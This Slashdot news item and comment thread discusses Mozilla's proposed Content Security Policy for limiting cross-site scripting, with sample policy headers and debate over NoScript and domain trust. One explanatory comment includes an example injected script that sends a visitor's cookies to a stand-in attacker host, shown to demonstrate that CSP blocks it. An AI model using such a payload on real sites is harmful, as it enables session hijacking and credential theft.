
New Firefox Standard Aims to Combat Cross-Site Scripting

ScuttleMonkey posted more than 4 years ago | from the fight-the-good-fight dept.

Security | 160 comments

Al writes "The Mozilla Foundation is to adopt a new standard to help web sites prevent cross-site scripting (XSS) attacks. The standard, called Content Security Policy, will let a website specify what Internet domains are allowed to host the scripts that run on its pages. This breaks with Web browsers' tradition of treating all scripts the same way, by requiring that websites put their scripts in separate files and explicitly state which domains are allowed to run them. The Mozilla Foundation selected this implementation because it allows sites to choose whether to adopt the restrictions. 'The severity of the XSS problem in the wild and the cost of implementing CSP as a mitigation are open to interpretation by individual sites,' Brandon Sterne, security program manager for Mozilla, wrote on the Mozilla Security Blog. 'If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'"
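For the curious, here is a minimal sketch of what such a policy could look like on the wire, using hypothetical host names. Mozilla's prototype carries the policy in an experimental X-Content-Security-Policy response header; in the draft syntax, "allow" is the catch-all directive and per-type directives such as "script-src" override it:

<ecode>X-Content-Security-Policy: allow 'self'; script-src 'self' scripts.example.com</ecode>

A page served with that header would execute scripts only from its own host and from scripts.example.com; anything injected inline, or pulled from any other domain, would simply not run.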


as an end user (2, Insightful)

Anonymous Coward | more than 4 years ago | (#28520787)

I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

Re:as an end user (3, Informative)

seifried (12921) | more than 4 years ago | (#28520937)

It doesn't quite work that way; it's much more fine-grained. I.e., as a site owner I can say something like:

allow /foo/bar.cgi?weird looking strings and block anything else

so if an attacker finds a cross-site scripting flaw in, say, "/login.php", the client won't accept it, protecting my client and the site owner as well (bad guys aren't harvesting credentials from users, etc.).

Re:as an end user (1)

kill-1 (36256) | more than 4 years ago | (#28523755)

No, CSP doesn't work like that. You can't specify path patterns or anything like that. If you have an XSS flaw on your site, an attacker can still inject scripts. But the scripts won't get executed, because CSP only allows external scripts from white-listed hosts.
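To make that concrete (a sketch with made-up domains): under a policy whose script-src list contains only trusted.example.com, the browser decides per script element, so an injected payload gains nothing:

<ecode>
<script src="http://trusted.example.com/app.js"></script> <!-- white-listed host: runs -->
<script src="http://evil.example.net/x.js"></script> <!-- not on the list: ignored -->
<script>document.location='http://evil.example.net/steal?c='+document.cookie</script> <!-- injected inline: ignored -->
</ecode>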

Re:as an end user (1)

seifried (12921) | more than 4 years ago | (#28523983)

Ack, I must have been thinking of mod_security, my bad. OTOH you can limit stuff by file/etc. to a pretty good degree using site security policy and achieve pretty much the same aims.

Re:as an end user (1, Funny)

sexconker (1179573) | more than 4 years ago | (#28520979)

As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit". ...

Fuck.

Re:as an end user (2, Interesting)

Arker (91948) | more than 4 years ago | (#28522949)

I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

Noscript does this.

Which brings me to the observation that, at least as far as I can tell from the blurb, this entire thing sounds a bit redundant in light of the ready availability of NoScript. Why not just make it part of the default Firefox install instead?

Good idea (0, Redundant)

thetoadwarrior (1268702) | more than 4 years ago | (#28520793)

As long as this isn't something that can easily be compromised then I think this is an excellent way of handling the problem.

Re:Good idea (4, Insightful)

NecroPuppy (222648) | more than 4 years ago | (#28520833)

First thoughts on that:

If I say that my site trusts domain1.com, but domain1.com isn't using this and ends up having all sorts of dodgy scripts they're passing along, would this block them, or would they count as coming from domain1.com?

Re:Good idea (1)

sexconker (1179573) | more than 4 years ago | (#28520963)

When content is fed to you by/through domain1.com, do you see it as coming from domain1.com?

If the answer to that is YES, then you're FUCKED if domain1.com is serving up shit.

Re:Good idea (5, Interesting)

the_other_chewey (1119125) | more than 4 years ago | (#28521209)

If I say that my site trusts domain1.com, but domain1.com isn't using this and ends up having all sorts of dodgy scripts they're passing along, would this block them, or would they count as coming from domain1.com?

Domain1 wouldn't need to use this: it's a client-side security measure. If your site uses it and declares trusted third parties, that's enough.
Also, what is "passing along" supposed to mean? Scripts (or any other stuff) would either come from domain1 or not. If not, they wouldn't be trusted.
If domain1 proxies scripts from other sources, they come from domain1 as far as HTTP is concerned, and they would be trusted.

The problem I see, however, is domain1 declaring additional trusted domains when delivering its scripts, thereby allowing for "cascaded domain trust", which would pretty much defeat the new system. This could easily be prevented by not accepting additional trusted domains from third-party elements, though.

Re:Good idea (1)

CarpetShark (865376) | more than 4 years ago | (#28521725)

As long as this isn't something that can easily be compromised then I think this is an excellent way of handling the problem.

From the summary:

The standard, called Content Security Policy, will let a website specify what Internet domains are allowed to host the scripts that run on its pages.

As long as this "standard" is the one called HyperText Markup Language, then this makes sense. HTML is intended to say what scripts run on a page. If that's broken, then the HTML should be fixed. Somehow I suspect it's not broken, but that developers' implementations of sites are.

Managers (1)

uassholes (1179143) | more than 4 years ago | (#28520811)

"The Mozilla foundation is to adopt a new standard to help web site's prevent cross site scripting attacks (XSS). The standard, called Content Security Policy

Do you notice that the name does not sound like the description? Why do they never call it what it is?

Re:Managers (1)

EvanED (569694) | more than 4 years ago | (#28521045)

If you'll notice, CSS was already taken for web-stuff, and X often means "cross", so it does actually make sense.

Re:Managers (1)

leamanc (961376) | more than 4 years ago | (#28522355)

If you will notice, he meant that "Content Security Policy" as a name is less effective than, say, "Cross-Site Scripting Prevention Policy." He was not talking about XSS as an acronym.

Re:Managers (2, Informative)

maxume (22995) | more than 4 years ago | (#28522493)

It extends well beyond scripts into other content areas. It can be used to limit the domains that are allowed to serve images, CSS, and so on (this is all for a given page).
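For instance (a hedged sketch in the draft header syntax, with hypothetical hosts), a single header can lock down scripts, images, and stylesheets separately:

<ecode>X-Content-Security-Policy: allow 'self'; script-src 'self'; img-src 'self' images.example.com; style-src 'self'</ecode>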

No more hacking anti piracy organizations? (0, Offtopic)

basementman (1475159) | more than 4 years ago | (#28520821)

So does this mean we can't hack anti piracy organizations any more? http://torrentfreak.com/mpaa-website-now-with-torrents-090502/ [torrentfreak.com] http://torrentfreak.com/riaa-site-features-torrentfreaks-latest-news-090504/ [torrentfreak.com]

How does this change userland? (4, Insightful)

Red Flayer (890720) | more than 4 years ago | (#28520823)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit. And when I visit a site where I need to disable noscript, I have no other tabs/browsers open.

I'm sorry, but NO site can be trusted 100% from a user's perspective... and giving site owners the tools to help prevent XSS from their side doesn't help with the fact that users still shouldn't trust absolutely.

The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

Of course, I'm slightly paranoid. And of course, this isn't transparent to Joe Sixpack, so he's going to trust|!trust based on whatever it is he's basing it on now. And for security-critical sites like banks, this is a good thing... but I try very hard to make sure my friends & family are a bit paranoid too, so they'll take precautions.

Re:How does this change userland? (0)

Anonymous Coward | more than 4 years ago | (#28520995)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit.

Combine RequestPolicy [mozilla.org] with YesScript [mozilla.org]

Re:How does this change userland? (1)

TheRealMindChild (743925) | more than 4 years ago | (#28521019)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit

Dude. How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good? I would imagine almost all sites are going to break horribly if you only enable HALF of the scripts, whereas flat-out disabling them/running all scripts will give you a working site.

Re:How does this change userland? (3, Insightful)

Red Flayer (890720) | more than 4 years ago | (#28521215)

How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good?

Dare I say it?

Site XXXX is attempting to run a script on site YYYY.
(C)ANCEL or (A)LLOW?

All snark aside, why would I allow either of those domains to run a script on slashdot.org? Since I trust slashdot to a certain extent, I would allow from scripts.slashdot.org. But allowing scripts from a completely different domain? No way.

The point is that my security policy is annoying to implement. For site mybank.com I need to enable scripting. But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com. And if legitimate sites are hosting their scripts from an entirely different domain... well, that would have to change. Instead I have to take an all-or-none approach, since the sites I need security the most on are the ones where I need to enable scripting. That just sucks.

Re:How does this change userland? (2, Insightful)

maxume (22995) | more than 4 years ago | (#28521459)

Slashdot is currently pushing js from c.fsdn.com.

I think you have a pretty dim view of the ecosystem (or maybe you are viewing some really marginal sites, who knows). For the most part, a given page that you visit is not going to contain malicious code that sniffs for when you have an HTTPS cookie for your banking site and then mysteriously steals all your money. I say this confidently, as I am quite certain that the bad guys are much happier with the simpler task of installing malware keyloggers.

The only browser exploit I have personally encountered came from the server getting compromised (well, the account for a domain, probably not the whole server); obfuscated javascript had been appended to the bottom of a javascript file that the page loaded (the attack was a pdf, but I had that particular exploit locked down (or it didn't work in the version of Reader I use...), so no issues). Entertainingly, it was a blog post about web security (I let them know and they fixed it).

Re:How does this change userland? (1)

Red Flayer (890720) | more than 4 years ago | (#28522455)

And I know that fsdn.com is also a trusted site.

You're right that I'm not the most knowledgeable (to put it lightly) about the ecosystem. However, I think it's atrocious that I cannot easily and selectively block scripts from operating on sites I want to view. And not just for the sake of security... also for the sake of performance on older machines.

Re:How does this change userland? (1)

maxume (22995) | more than 4 years ago | (#28522693)

By 'dim', I meant that you have an overly negative view, I wasn't speculating as to your level of knowledge.

Re:How does this change userland? (1)

v(*_*)vvvv (233078) | more than 4 years ago | (#28523547)

why would I allow either of those domains to run a script on slashdot.org?

You wouldn't. Slashdot would. This is about the site creator specifying a white list, and not about the visitor being prompted about it.

But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com.

Am I misunderstanding the description of this extension? Because to me this sounds exactly like what it does. You enable scripts from domains you specify. Thus, no JavaScript injection or form hacking will get a page to retrieve foreign scripts without the attacker being able to physically alter the document.

Re:How does this change userland? (2, Interesting)

Anonymous Coward | more than 4 years ago | (#28521361)

That reminds me -- since recently I have to tell NoScript to allow scripts from fsdn.com in order to browse slashdot.org successfully. I *know* that FSDN is slashdot's parent company, but it doesn't seem right that I can't use slashdot's discussion interface without giving permission to all of FSDN.

Similarly, recently I have to allow gstatic.com and/or googleapis.com to use Google-enabled websites that worked fine before.

Like the parent post's point: it's getting harder for a user to selectively narrow permissions down.

Re:How does this change userland? (1)

hedwards (940851) | more than 4 years ago | (#28521027)

Well, it irritates me to no end that there isn't a mandatory listing of all the sites that serve scripts for a page, complete with some sort of explanation.

I absolutely hate having to figure out which domain that I've blocked will allow access to the content, and which ones are dodgy. And further, whether the site that's serving up the content is safe enough to allow.

Re:How does this change userland? (1)

Red Flayer (890720) | more than 4 years ago | (#28521289)

If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

At some point, you need to trust *someone* to tell you who else you can trust... and that'll always be a problem.

Re:How does this change userland? (1)

Jurily (900488) | more than 4 years ago | (#28522375)

What irritates me is that all the browsers I've ever heard of run everything they can by default. The only distro coming even close to something sane is Gentoo, with the "restrict-javascript" USE flag for Firefox (it pulls in NoScript, but still does not enable it by default).

Of course I can't know about everything, feel free to correct me.

Re:How does this change userland? (0)

Anonymous Coward | more than 4 years ago | (#28523021)

You know what's even more insane? After installing an application, it defaults to executable! Can you believe that?!

Re:How does this change userland? (1)

Jherek Carnelian (831679) | more than 4 years ago | (#28521287)

Indeed, I wish noscript would allow me to whitelist domains and even specific scripts on a per-site basis. So, for example, I could whitelist maps.google.com's use of javascript from gstatic.com but not allow any other sites, like images.google.com, to pull in javascript from gstatic.com.

Re:How does this change userland? (1)

oldhack (1037484) | more than 4 years ago | (#28521409)

I second "yay!" for Noscript. You have no idea how tangled commercial websites are until you use noscript.

eBay and MySpace? (3, Insightful)

POWRSURG (755318) | more than 4 years ago | (#28521523)

CSP is effectively server-side NoScript. And it isn't exactly new either. This has been in development as a Firefox extension for at least a year. The article mentions it being first crafted back in 2005.

The issue I take with this article is that it suggests this feature could even possibly be integrated into eBay or MySpace. These two giants seem like the exact opposite of the market that would use this: any site that allows users to post their own data is not going to survive the wrath it would catch if users had to explicitly allow the domains they want scripts to run from. For a corporate Web site, yes; but for something for the masses, or those of us that run a CMS? I don't see that happening anytime soon.

Re:eBay and MySpace? (2, Informative)

kill-1 (36256) | more than 4 years ago | (#28523823)

Apparently, you have no idea what XSS means. Neither eBay nor MySpace allows the execution of user-provided scripts, for obvious reasons. Given the market share of Firefox, the big sites will implement CSP pretty soon.

Re:How does this change userland? (1)

MikeFM (12491) | more than 4 years ago | (#28523703)

I've been suggesting a fix like this for years, but my suggested implementation let users add further limitations. It's stupid not to let users tighten controls, even if they can't make controls any weaker than the site has configured. You'll never have perfect security, but at least this is a step in the right direction.

SPF for JavaScript (1, Redundant)

The Yuckinator (898499) | more than 4 years ago | (#28520831)

On the surface this sounds like a great idea. Sort of like SPF for JavaScript. Of course I'm sure that more knowledgeable folks than I will do their best to poke holes in it. I guess the other browsers will just ignore this unless of course they jump on board and implement it too.

Re:SPF for JavaScript (2, Funny)

the_other_chewey (1119125) | more than 4 years ago | (#28521249)

I guess the other browsers will just ignore this unless of course they jump on board and implement it too.

Exactly. Also, it will rain tomorrow. Unless it doesn't.

Cost vs. Benefit? (3, Interesting)

spydabyte (1032538) | more than 4 years ago | (#28520883)

'If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'

The author gave the best reason for not implementing this.

The benefits of this, and of other security measures, won't be seen until it's tested. The costs of testing? Way too high compared to the current cost of operation. This is a very hard proof-of-concept problem, and unless this is already built into development standards, I doubt any deployments would switch. Which would you take: the option which delays production for a week, or the option to just hit "next"?

Re:Cost vs. Benefit? (1)

hedwards (940851) | more than 4 years ago | (#28521055)

Of course it doesn't. For the most part, sites that are vulnerable aren't made to pay for the damage that their lack of security has caused. If we forced sites to pay for their mistakes, that would change things really fast.

The TD Ameritrade settlement, for instance, was an absolute joke: they lost a lot of personal information and then got a slap on the wrist. It's not going to be cost-effective for organizations to secure their sites as long as they're free to pass the cost on to the end user.

Article on this and related technologies (2, Interesting)

seifried (12921) | more than 4 years ago | (#28520897)

Shameless self-plug: I wrote about this in my column, Web security - Protecting your site and your clients [linux-magazine.com], in September of 2008, and I'm VERY glad to see this moving forward. It means I (as a site owner) can actually do something to protect my site and my users against flaws in my site, in a way that is relatively easy and non-intrusive (that's the key!). The thing I really love about this: if your clients don't support site security policy, things still work; if your browser supports it but the remote web site doesn't, things still work; but if both ends support it, you get a nice added layer of protection. What would be really wild is if Microsoft added support for it; although "not invented here", they have been making efforts to protect users from XSS attacks in IE8, with mixed success, so who knows. You can potentially do similar things with mod_security and outgoing filters, but it is nowhere near as simple as site security policy should (hopefully) be to deploy.

Re:Article on this and related technologies (1)

michaelhood (667393) | more than 4 years ago | (#28521629)

I (as a site owner) can actually do something to protect my site and my users against flaws in my site, in a way that is relatively easy and non-intrusive (that's the key!).

Unless your users run something besides Firefox.

If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

Re:Article on this and related technologies (2, Informative)

node 3 (115640) | more than 4 years ago | (#28521791)

If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

Extinguish.

It's Embrace, Extend, Extinguish. That last E makes all the difference in the world.

Use a file? (1, Interesting)

Anonymous Coward | more than 4 years ago | (#28520905)

Instead of making me modify each file to send that header/meta tag, why not make it like the Flash security files and just have a file in the root directory?

You're doing it wrong (1, Flamebait)

XanC (644172) | more than 4 years ago | (#28520959)

If you're having to modify individual files to set HTTP headers, you're doing it wrong. Also, polluting sites' namespaces (even worse than they already are with robots.txt/favicon.ico) is a bad idea.
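The right way, for comparison, is one directive in the server config. A sketch assuming Apache httpd with mod_headers enabled; it stamps the header onto every response without touching individual files:

<ecode>
# httpd.conf or a vhost block, not per-file
Header set X-Content-Security-Policy "allow 'self'"
</ecode>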

But then, you already betrayed your cluelessness when you revealed that you put Flash on the Web.

Re:You're doing it wrong (0)

Anonymous Coward | more than 4 years ago | (#28521005)

I didn't say I used Flash, did I? I just used the Flash file as an example.

Re:Use a file? (1)

EvanED (569694) | more than 4 years ago | (#28521095)

Oh, please don't do that. Don't assume that we have rights to that directory. I already really really wish I could set robots.txt for just my subdirectory, but no can do since some semi-moron thought it would be a good idea to make me mail my school department's webmaster to exclude part of my directory.

Re:Use a file? (1)

seifried (12921) | more than 4 years ago | (#28521123)

You could simply use .htaccess and restrict based on user agent. Ugly, lots of overhead (every request = a hit on .htaccess), but it would work (at least for polite robots, but this is also true of robots.txt).
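Something along these lines (a sketch of Apache 2.2-style access control in .htaccess; it only catches polite bots that send honest User-Agent strings):

<ecode>
# Tag requests from the common crawlers, then refuse them
SetEnvIfNoCase User-Agent "Googlebot|Slurp|msnbot" is_bot
Order Allow,Deny
Allow from all
Deny from env=is_bot
</ecode>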

Re:Use a file? (1)

EvanED (569694) | more than 4 years ago | (#28521243)

Ugly, lots of overhead...

And requires me to figure out the user agent of either every browser out there (to allow) or every bot out there (to deny). At least, as far as I can tell.

Re:Use a file? (1)

seifried (12921) | more than 4 years ago | (#28521353)

No, just block the common ones (Googlebot and Yahoo Slurp are the majority of it). If you're actually trying to protect this content, then you need to password-protect it (or similar); robots.txt is not the way to prevent exposure. As well, you could also use the meta tag in HTML documents:

<meta name="robots" content="noindex">

But I agree, robots.txt is far less painful and much quicker. A thing to remember as well: when robots.txt was invented, the web was a much simpler place, and everyone online was pretty much skilled in the art by definition.

Re:Use a file? (2, Informative)

michaelhood (667393) | more than 4 years ago | (#28521805)

Ugly, lots of overhead...

And requires me to figure out the user agent of either every browser out there (to allow) or every bot out there (to deny). At least, as far as I can tell.

No, only "bots" (spiders, nowadays) actually check robots.txt, per the RFC. User-initiated requests don't (and shouldn't) request or parse robots.txt; no browser I've ever seen does.

Re:Use a file? (0)

Anonymous Coward | more than 4 years ago | (#28523623)

Which would be a relevant comment were they not talking about .htaccess files rather than robots.txt.

Re:Use a file? (1)

jonbryce (703250) | more than 4 years ago | (#28521283)

And can you be sure you have all the legitimate user agents?

Certainly IE, Mozilla, Safari, Chrome and Opera will cover most of the desktop/laptop user agents, but what about all the obscure browsers used on phones and other mobile devices?

Re:Use a file? (1)

michaelhood (667393) | more than 4 years ago | (#28521727)

Oh, please don't do that. Don't assume that we have rights to that directory. I already really really wish I could set robots.txt for just my subdirectory, but no can do since some semi-moron thought it would be a good idea to make me mail my school department's webmaster to exclude part of my directory.

You can do everything that you do with robots.txt via robots meta tags [robotstxt.org] and streamline their inclusion with some server-side scripts if so desired.

Old Standard to Prevent All Attacks (0, Troll)

sexconker (1179573) | more than 4 years ago | (#28520935)

Don't let other people serve content via your site.

Don't rely on shitty plugins from security failures such as Adobe.

Don't depend on user-generated content, since it's shit. If your site can't provide its own content, at least properly filter incoming user content down to plain ol' text.

Don't sign up with a shitty registrar who will transfer your domain/dns/mx records to some slut like godaddy at the drop of a hat.

Don't give people the password to your account at your host/registrar, and don't give people access to your fucking ftp/ssh/direct/etc. accounts for your server.

Re:Old Standard to Prevent All Attacks (1)

Red Flayer (890720) | more than 4 years ago | (#28521009)

Don't depend on user-generated content, since it's shit. If your site can't provide its own content, at least properly filter incoming user content down to plain ol' text.

Hey! It doesn't need to be plain ol' text.

As a theoretical, it could be hamstrung html that pisses off some users by not recognizing UTF-8 in order to prevent malicious posting.

Or something. I'm sure we could figure out a decent implementation.

Re:Old Standard to Prevent All Attacks (1)

seifried (12921) | more than 4 years ago | (#28521071)

Don't let other people serve content via your site.

Problem is that security flaws such as cross-site scripting (XSS) allow exactly this (inserting arbitrary HTML/JavaScript into the page, which is then rendered by the client browser).

Re:Old Standard to Prevent All Attacks (1)

EvanED (569694) | more than 4 years ago | (#28521171)

Don't depend on user-generated content, since it's shit.

Says the person providing user-generated content to a site that depends on it.

Re:Old Standard to Prevent All Attacks (2, Informative)

jonbryce (703250) | more than 4 years ago | (#28521307)

Don't depend on user-generated content, since it's shit. If your site can't provide its own content, at least properly filter incoming user content down to plain ol' text.

I suggest you resign from Slashdot as soon as possible then ...

Re:Old Standard to Prevent All Attacks (2, Interesting)

sexconker (1179573) | more than 4 years ago | (#28521679)

Why is this modded troll?

99.99999% of attacks are the result of:

Malicious ads and clickthrough "offers" after a sale is processed
Vulnerabilities in PDF, Flash, etc.
Malicious content uploaded by users (javascript, sql injection, malformed jpegs, what have you)
Domain hijacking
General "LOL I GOT UR PASSWORD" shenanigans

Re:Old Standard to Prevent All Attacks (2, Interesting)

Runaway1956 (1322357) | more than 4 years ago | (#28523309)

Sexconker is modded a troll - quite unfairly. Cross site scripting sucks. Simple as that. I go to a site, first thing I see is noscript's popup message that anywhere between 2 and 20 sites want to run scripts in my browser. I click the popup, to see WHO wants to run scripts. Sometimes, it's easy to see who wants to do what, and deciding to allow site a, but not site b is quite simple.

Often enough, it's just not that simple. I want to see some stupid Flash presentation, and the only way to see it is to enable Flash. Unfortunately, three different sites are offering a Flash file. Which one do I want? I choose one to be allowed, and I get rickrolled.

That is hamshite. Nothing more, and nothing less. The original site should be hosting its own material, or they should supply the link to see the Flash presentation. Cross-site scripting is a ripoff that just helps to confuse the security conscious. And, God knows, there are far too few users who are conscious. (I'd like to see a scientific poll that demonstrates just how many users really are brain dead; it has to be over 20%, and might be over 50%.)

Some History (1)

eplawless (1003102) | more than 4 years ago | (#28520951)

I know there's been a lot of dialogue between the authors of SOMA [carleton.ca] , which predates this, and the Mozilla team; it might provide some interesting context.

Headline: Google, other ad publishers' revenues drop (2, Interesting)

rescendent (870007) | more than 4 years ago | (#28520999)

Presumably the millions of AdSense (and other ad network) publishers will have to enable their sites to maintain adverts..? Might hit Google revenues a bit...

Re:Headline: Google other ad publishers revenues d (1)

RalphSleigh (899929) | more than 4 years ago | (#28521263)

Obviously, if a site does not send one of these headers, it will default to allow-from-all. Also called: not breaking the whole internet with your new browser feature.

This is great for Firefox users... (2, Interesting)

randomnote1 (1273964) | more than 4 years ago | (#28521029)

What about IE, Chrome, Opera, and Safari users? As of now this solution only benefits a small portion of users. I don't see this being widely implemented at all.

Re:This is great for Firefox users... (2, Insightful)

hansamurai (907719) | more than 4 years ago | (#28521301)

Well, if Firefox users find it effective, then other companies will follow suit. It's just a standard Mozilla is adopting; though it seems to have been defined in-house, that won't stop anyone else from using it.

Re:This is great for Firefox users... (1)

Vectronic (1221470) | more than 4 years ago | (#28521461)

IE has an XSS Filter... I don't use IE enough to have bothered to investigate it, though. Otherwise, Opera, Safari and Chrome don't seem to be doing anything special about XSS, at least not advertising it, other than patching their own vulnerabilities against a few known methods.

Re:This is great for Firefox users... (1)

dveditz (11090) | more than 4 years ago | (#28523681)

Even if this were never implemented in any other browser, sites would still benefit through early detection of active attacks. If your site implements a security policy with a report URI, then every Firefox visitor will be conducting a passive security scan on every page they visit, at least for the types of security problems CSP targets (primarily XSS).
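The reporting hook is just another directive in the policy. A sketch with a hypothetical endpoint; as I read the draft, a compliant browser that detects a violation POSTs a report to the named URI, which is what turns every visitor into the passive scanner described above:

<ecode>X-Content-Security-Policy: allow 'self'; report-uri /csp-violation-report</ecode>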


A step in the right direction (1)

Ambush Commander (871525) | more than 4 years ago | (#28521047)

The first trap you will fall into when thinking about this is assuming that it should be the end-all security policy and will solve our problems. It won't. That's not the intent, and it's also impossible given our diverse browser ecosystem.

The ability to tell the browser, via out-of-band, non-XSS-able information, that certain scripts should not be executed is, however, a very powerful defense-in-depth measure, and it makes it one step harder for attackers to make an attack work.

Security is a war of attrition. Bring it on.

NOT a standard (3, Informative)

Curate (783077) | more than 4 years ago | (#28521051)

The summary is wrong: this is NOT a standard in any way, or even a proposed standard. This is a proprietary security feature being introduced by Firefox. I'm not saying this is a bad thing (it's not), or that this won't eventually become a de facto standard (it might). But it is not a standard.

Re:NOT a standard (0)

Anonymous Coward | more than 4 years ago | (#28521541)

They explain how it works, and it's open source. How can you call that proprietary? Maybe it hasn't passed through a standards body, but that doesn't mean it can't be freely implemented in any other browser.

Re:NOT a standard (1)

Curate (783077) | more than 4 years ago | (#28521915)

Sure, they've published the spec, but that doesn't make it non-proprietary. Is it controlled by Mozilla or by a neutral standards body? There are lots of analogies to this, e.g., Microsoft has openly published the SMB spec, yet they control it; it is proprietary. Or maybe we have different interpretations of the word "proprietary"? In any case, I did not mean to emphasize the word "proprietary" or any connotations it may evoke. I used that word in my post, but it wasn't the main point. My main point is that this is not a standard. Calling this new feature a standard actually dilutes the meaning of the word "standard". Can we just call almost any new feature a standard?

Standard? (2, Informative)

pablodiazgutierrez (756813) | more than 4 years ago | (#28521113)

More than a "Firefox standard", it seems to me that this is an extension. I'm all for it, but let's call things by their name.

Yea. they are free. right. (1)

unity100 (970058) | more than 4 years ago | (#28521155)

Just like they forced the 'humongous, scary SSL warning error' instead of the previous acceptable and understandable error message. It forced a lot of small businesses who used certificates they themselves signed to buy third-party certificates from vendors. Again with this change, all small businesses will have to spend more on web development charges, because most end users will set their Firefox to the 'prevent' setting for this new feature. The 'free to do business as usual' bit is bullshit. Remember, say the word 'security' and you can even sell wars to people. So don't feed the 'free to do business as usual' bullshit to anyone.

One thing that is most damaging to us in the open source crowd is being too self-righteous and Jacobin. It starts to hurt us more as time passes and projects develop. This time it's happening with Firefox.

Re:Yea. they are free. right. (1)

netsharc (195805) | more than 4 years ago | (#28521317)

Your last paragraph reminds me, hey Firefox is open source, let's just fork it!

Re:Yea. they are free. right. (1)

maxume (22995) | more than 4 years ago | (#28521335)

It will default to off. Defaulting to on would mean that offsite images would no longer load (nor would any content that is pulled from a CDN).

Re:Yea. they are free. right. (1)

ZorinLynx (31751) | more than 4 years ago | (#28521735)

Anyone doing business should have a legitimate SSL certificate for the site and not use a self-signed certificate. Anyone using a website should be wary of any business site using a self-signed certificate.

Self-signed certificates are okay for personal servers where you know you or a friend signed the cert, but if you're doing business it is a VERY BAD IDEA to use or trust self-signed certs. Firefox's behavior is correct in this regard.

Re:Yea. they are free. right. (1)

Jubilex (28229) | more than 4 years ago | (#28522135)

Speaking as an admin, I've seen way too many end users click through certificate warnings for self-signed certs without understanding what they are doing. Firefox is doing the right thing (and now that IE 8 is doing something similar, I'd say they aren't the only ones who think so.)

Re:Yea. they are free. right. (0)

Anonymous Coward | more than 4 years ago | (#28523885)

Sigh. With a self-signed certificate, there is no guarantee that you have an encrypted session all the way to the webserver. Hint:

Client <-> Malicious Proxy Server <-> Webserver

Nothing stops the proxy from terminating the SSL connection, logging the (now decrypted) traffic, and then starting a new encrypted connection to the webserver.

But if the certificate has to be signed, the malicious proxy cannot terminate an encrypted connection while pretending to be the webserver, as it will not have a certificate that can be used to impersonate the webserver.

RFC? (3, Insightful)

Midnight Thunder (17205) | more than 4 years ago | (#28521179)

Is this 'standard' endorsed by anyone else, or written up as part of an RFC? Calling something a standard when you are the only guys doing it sounds like a certain company that was started by Bill and Paul.

I am not trying to troll here, since I am all for the solution; I am just making sure that this is properly documented and shared with the right entities (think W3C).

Re:RFC? (2, Informative)

Midnight Thunder (17205) | more than 4 years ago | (#28521285)

I should have read the article first, since nowhere in the article do they mention the word 'standard'. When they do decide to make it happen, I hope they submit the proposal to the right organisations, so as to avoid making this a one-browser standard.

Re:RFC? (1)

blair1q (305137) | more than 4 years ago | (#28522393)

Bill and Paul made about $100 billion, and their bugs have become the standard that most "standards" can't dislodge.

Anyone can proclaim a "standard"; recall what "RFC" stands for? It's not "peer-reviewed and passed by governing bodies."

If Mozilla is saying this is how they're building it into the code base, the W3C can ignore it, but then it's the W3C who won't be compatible with what is standard.

Break Bookmarklets? (1)

zmnatz (1502127) | more than 4 years ago | (#28521247)

Just wondering: wouldn't this break a lot of bookmarklets, since they are essentially JavaScript being run from a different location on the site? Correct me if I'm wrong (I probably am).

Massive Overkill (2, Informative)

butlerm (3112) | more than 4 years ago | (#28521259)

This proposal looks like massive overkill to me. Implementing the restriction on inline script tags is equivalent to saying: our web developers are incompetent and naive and cannot be trusted to take basic security measures, so we feel that making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade-off.

A more effective program would be to develop and promote standardized HTML sanitization routines for popular web development languages, so that user-entered HTML could easily be accepted under certain restrictions. Most weblogs do this already.

Alternatively, a less draconian solution would be to allow inline scripts to execute if the script tag includes a response-specific serialization value that is also present in the HTTP headers. 64-bit values would make forging an inline script essentially impossible, because there would only be a 1/2^64 probability of an accidental match.
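A sketch of that serialization-value idea, with a hypothetical header name and token (nothing like this is in the actual proposal): the server mints a fresh random value per response, and only script blocks that echo it back are executed, so an injected script, which cannot read the response headers in advance, never matches:

<ecode>
X-Script-Token: 9f3a61c0d54b8e72 (hypothetical per-response header)

<script token="9f3a61c0d54b8e72">init();</script> <!-- matches the header: runs -->
<script>evil();</script> <!-- no token: refused -->
</ecode>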

Re:Massive Overkill (1)

v(*_*)vvvv (233078) | more than 4 years ago | (#28523655)

our web developers are incompetent and naive and cannot be trusted to take basic security measures, so we feel that making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade-off.

The real question is, can YOU trust your web developers? And is this really that much more cumbersome and inefficient than every other measure? It's just another tag. In fact, it is *just* a tag. It also sits at the source of the problem: the web browser. You could argue everything else is a workaround, and finally we are getting help from the people responsible for inventing the problem.

A more effective program would be to develop and promote standardized HTML sanitization routines for popular web development languages

Yes, except: this is not easy, it is already being done, and it isn't quite working.

If one tag could eliminate the risk of external scripts running on my pages, I'd be all for it. Of course, this only works with Firefox, so it is actually quite meaningless. Hackers can just fire up a different browser, so the number of hackers this will stop is exactly ZERO.

How do you code without any inline scripting? (1, Informative)

Anonymous Coward | more than 4 years ago | (#28522319)

